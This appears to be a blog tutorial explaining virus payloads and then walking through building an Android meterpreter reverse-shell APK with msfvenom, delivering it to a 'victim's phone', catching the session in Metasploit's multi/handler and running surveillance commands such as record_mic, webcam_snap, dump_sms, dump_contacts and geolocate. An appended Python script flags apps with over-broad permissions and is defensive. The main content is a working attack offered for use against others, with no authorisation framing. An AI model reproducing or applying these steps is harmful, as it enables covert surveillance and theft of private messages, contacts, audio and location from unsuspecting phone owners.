What Is a Payload & How to Hack Android/Windows with It

Definition - What Is a Payload?

A payload is the component of a computer virus that performs the malicious activity. Besides how fast the virus spreads, its threat level is determined by the damage it causes, so viruses with more powerful payloads are often more harmful. Not all viruses carry a payload. Examples of payloads that are considered very dangerous are data destruction, offensive messages, and spam sent from an infected user's account. A payload is also called a destructive payload.

My Explanation

Other viruses may steal data or files, allow eavesdropping or unauthorized access, destroy data, or cause other consequences. A virus may also carry multiple payloads.

Malware today rarely carries payloads that corrupt system files. Instead, it opens a backdoor to the user's computer to steal confidential information.

A payload can be executed in the following ways:

1. Using an unprotected computer connected to the network (no proper antivirus installed)

2. Booting the computer from infected removable media

3. Opening an infected file, or running an infected program

4. Activating a logic bomb


How to Hack with it?

1. Start kali and open the command terminal.

2. Set the payload and create a custom executable.
Command:
         root@kali:~# msfvenom -p android/meterpreter/reverse_tcp  LHOST=192.168.0.110 LPORT=4444 R > andro.apk

(To know your LHOST, open a new terminal and enter ifconfig)

Note: Don't add any stray space characters anywhere. Use the command as is (after changing the LHOST and LPORT as needed).

3. Transfer or send the file (andro.apk) to the victim's phone for installation.

4. Start the Metasploit Framework console as follows:

Command:
      root@kali:~# msfconsole

5. Now open and configure the multi/handler. Follow the steps below:

msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

6. If the victim opens the application on their phone (installed as MAIN ACTIVITY in the menu), a Meterpreter session will be established.

7. Try the following exploit commands :
    - record_mic
    - webcam_snap
    - webcam_stream
    - dump_contacts
    - dump_sms
    - geolocate
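
Seen from the defender's side, each command in step 7 depends on an Android permission, so an app that requests INTERNET together with most of them deserves review before it is installed. The triage script below is an added example, not part of the original post; the permission mapping, the threshold, the package names and the sample manifests are assumptions constructed for illustration, and it expects a manifest already decoded to text XML.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
P = "android.permission."

# Assumed mapping: step-7 command -> permission(s) that capability relies on.
CAPABILITIES = {
    "record_mic": {P + "RECORD_AUDIO"},
    "webcam_snap/webcam_stream": {P + "CAMERA"},
    "dump_contacts": {P + "READ_CONTACTS"},
    "dump_sms": {P + "READ_SMS"},
    "geolocate": {P + "ACCESS_FINE_LOCATION", P + "ACCESS_COARSE_LOCATION"},
}

def requested_permissions(manifest_xml):
    """Return the set of <uses-permission> names in a decoded manifest."""
    root = ET.fromstring(manifest_xml)
    return {el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")}

def triage(manifest_xml, threshold=3):
    """Flag apps that can reach the network and cover >= threshold capabilities."""
    perms = requested_permissions(manifest_xml)
    covered = sorted(cap for cap, needed in CAPABILITIES.items() if perms & needed)
    has_net = P + "INTERNET" in perms
    return {"network": has_net, "capabilities": covered,
            "suspicious": has_net and len(covered) >= threshold}

def manifest(package, perms):
    """Build a constructed sample manifest in text form."""
    uses = "".join(f'<uses-permission android:name="{P}{p}"/>' for p in perms)
    return ('<manifest xmlns:android="http://schemas.android.com/apk/res/android" '
            f'package="{package}">{uses}</manifest>')

# Constructed samples with hypothetical package names, not real apps.
SAMPLE_OVERBROAD = manifest("com.example.flashlight", [
    "INTERNET", "RECORD_AUDIO", "CAMERA", "READ_CONTACTS",
    "READ_SMS", "ACCESS_FINE_LOCATION"])
SAMPLE_BENIGN = manifest("com.example.qrscanner", ["INTERNET", "CAMERA"])
SAMPLE_OFFLINE = manifest("com.example.recorder", [
    "RECORD_AUDIO", "CAMERA", "READ_CONTACTS"])

if __name__ == "__main__":
    for name, xml in [("overbroad", SAMPLE_OVERBROAD),
                      ("benign", SAMPLE_BENIGN),
                      ("offline", SAMPLE_OFFLINE)]:
        print(name, triage(xml))
```

A flagged result is a prompt for manual review, not proof of malice: legitimate messaging or backup apps can request the same set.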

If you guys need any help regarding this article, you can comment down below :)
